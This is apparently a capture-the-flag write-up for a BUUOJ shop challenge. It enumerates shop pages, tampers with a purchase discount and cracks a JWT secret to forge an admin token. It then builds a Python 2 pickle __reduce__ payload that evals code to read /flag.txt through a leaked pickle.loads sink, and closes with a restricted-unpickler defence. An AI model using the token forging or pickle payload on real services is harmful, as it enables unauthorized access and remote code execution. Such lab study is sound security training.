# \[North China Division] ikun

Find the page that contains lv6 by enumerating shop pages:

```python
import requests

# Walk the shop pages until one renders the lv6 item image.
for i in range(512):
    url = f"http://78cd9dcd-96d8-4fb8-9785-be448ad9dc9e.node3.buuoj.cn/shop?page={i}"
    response = requests.get(url=url)
    if response.text.find("lv6.png") != -1:
        print(i)
        break
```

lv6 is on page 181. Intercept the purchase request and change the discount multiplier; the site then redirects to b1g\_m4mber, which says only admin may access it. Capturing that request shows the authentication is a JWT.

Brute-force the JWT secret with c-jwt-cracker:

```shell
$ docker build . -t jwtcrack
$ docker run -it --rm  jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.dDz06h0lkd5_0DT8vUVcGLBGvX2btxx2AyJJCQWkEoQ
```

Re-sign the token with the recovered secret and `username` set to `admin`:

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
```


The source code is leaked; the deserialization sink is in Admin.py.

```python
# Leaked challenge source (Python 2): Admin.py
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        # Only the admin user is shown the form page.
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            # Deserialization sink: the URL-decoded `become` parameter goes
            # straight into pickle.loads, so a __reduce__ payload runs here.
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)
```

The `__reduce__` method is invoked during deserialization, much like PHP's `__wakeup`; the script below is based on 王叹之's.

```python
# Python 2, matching the challenge environment (print statement, urllib.quote)
import pickle
import urllib


class payload(object):
    # __reduce__ runs when the pickle is loaded, so pickle.loads on the
    # server calls eval() with this argument.
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()",))


a = pickle.dumps(payload())
a = urllib.quote(a)  # URL-encode for the `become` POST parameter
print a
```

The important point is that this challenge runs on Python 2, and pickle serialization differs between Python 2 and Python 3; I was stuck on that for quite a while.
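As an added example (not part of the original writeup), here is the vulnerable `pickle.loads` pattern from Admin.py beside a hardened unpickler, written in Python 3: a `__reduce__` payload can only name its callable through a global lookup, so overriding `find_class` with an allow-list rejects it. `record` is a constructed, harmless stand-in for `eval` so that execution-on-load is observable.

```python
import io
import pickle
from collections import OrderedDict

CALLS = []  # records what ran *during* unpickling

def record(tag):
    # Harmless stand-in for eval() in the writeup's payload; it runs inside
    # pickle.loads, before the caller ever sees the result.
    CALLS.append(tag)
    return "ran:" + tag

class Payload:
    # Same trick as the writeup: __reduce__ tells pickle to rebuild the
    # object by calling record("pwned"), so the call is part of loading.
    def __reduce__(self):
        return (record, ("pwned",))

class RestrictedUnpickler(pickle.Unpickler):
    # A __reduce__ payload must reference its callable with a GLOBAL or
    # STACK_GLOBAL opcode, and every such reference is resolved through
    # find_class; honouring only an explicit allow-list closes that door.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def vulnerable_loads(data):
    return pickle.loads(data)  # what Admin.py does with the `become` value

def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demo():
    blob = pickle.dumps(Payload())
    CALLS.clear()
    vulnerable_loads(blob)  # record("pwned") fires here
    fired, blocked = list(CALLS), False
    CALLS.clear()
    try:
        safe_loads(blob)
    except pickle.UnpicklingError:
        blocked = True
    benign = safe_loads(pickle.dumps(OrderedDict(username="guest")))
    return {"fired": fired, "blocked": blocked, "after_safe": list(CALLS),
            "benign": dict(benign)}
```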
